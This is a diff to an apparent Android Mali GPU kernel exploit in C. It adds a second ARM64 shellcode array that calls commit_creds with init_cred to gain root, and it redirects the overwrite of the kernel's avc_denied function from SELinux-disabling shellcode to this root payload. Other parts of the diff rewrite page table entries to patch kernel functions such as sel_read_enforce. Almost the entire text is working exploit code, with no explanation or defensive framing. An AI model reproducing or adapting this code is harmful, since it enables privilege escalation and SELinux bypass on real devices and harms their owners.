diff --git a/mali_shrinker_mmap32.c b/mali_shrinker_mmap32.c index 3cd6753..63e0ea9 100644 --- a/mali_shrinker_mmap32.c +++ b/mali_shrinker_mmap32.c @@ -91,6 +91,7 @@ Overwriting SELinux to permissive static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0}; static uint32_t root_code[8] = {0}; +static uint32_t root_code2[8]={0}; static uint32_t root_code_un[8] = {0}; static uint8_t jit_id = 1; @@ -469,15 +470,15 @@ void fixup_root_shell2(uint64_t init_cred, uint64_t commit_cred, uint64_t avc_de printf("Run fixup_root_shell2\n"); uint32_t init_adpr = write_adrp(0, avc_deny, init_cred); // Sets x0 to init_cred - root_code[ADRP_INIT_INDEX] = init_adpr; - root_code[ADD_INIT_INDEX] = add_init; + root_code2[ADRP_INIT_INDEX] = init_adpr; + root_code2[ADD_INIT_INDEX] = add_init; // Sets x8 to commit_creds - root_code[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred); - root_code[ADD_COMMIT_INDEX] = add_commit; - root_code[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] - root_code[5] = 0xd63f0100; // blr x8 - root_code[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 - root_code[7] = 0xd65f03c0; // ret + root_code2[ADRP_COMMIT_INDEX] = write_adrp(8, avc_deny, commit_cred); + root_code2[ADD_COMMIT_INDEX] = add_commit; + root_code2[4] = 0xa9bf7bfd; // stp x29, x30, [sp, #-0x10] + root_code2[5] = 0xd63f0100; // blr x8 + root_code2[6] = 0xa8c17bfd; // ldp x29, x30, [sp], #0x10 + root_code2[7] = 0xd65f03c0; // ret printf("End fixup_root_shell2\n"); } @@ -690,33 +691,15 @@ void write_selinux(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) //Go through the reserve pages addresses to write to avc_denied with our own shellcode write_data(mali_fd2, selinux_enforcing, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, 0, MALI_WRITE_VALUE_TYPE_IMMEDIATE_32); } -/*for onyx void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { - uint64_t sel_read_handle_unknown_addr = (((sel_read_handle_unknown + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; - write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_handle_unknown_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); - - usleep(100000); - - //Call commit_creds to overwrite process credentials to gain root - write_func(mali_fd2, sel_read_handle_unknown, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code_un[0]), sizeof(root_code_un)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_READ, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); -// write_func(mali_fd2, selinux_enforcing_WRITE, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code[0]), sizeof(root_code)/sizeof(uint32_t)); -} -*/ -//original code(avc_deny) -void write_shellcode(int mali_fd, int mali_fd2, uint64_t pgd, uint64_t* reserved) { - /* Skip this uint64_t avc_deny_addr = (((avc_deny + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64); usleep(100000); //Go through the reserve pages addresses to write to avc_denied with our own shellcode - write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(permissive[0]), sizeof(permissive)/sizeof(uint32_t)); + write_func(mali_fd2, avc_deny, reserved, TOTAL_RESERVED_SIZE/RESERVED_SIZE, &(root_code2[0]), sizeof(root_code2)/sizeof(uint32_t)); - //Triggers avc_denied to disable SELinux - open("/dev/kmsg", O_RDONLY); - */ uint64_t sel_read_enforce_addr = (((sel_read_enforce + KERNEL_BASE) >> PAGE_SHIFT) << PAGE_SHIFT)| 0x443; write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), sel_read_enforce_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);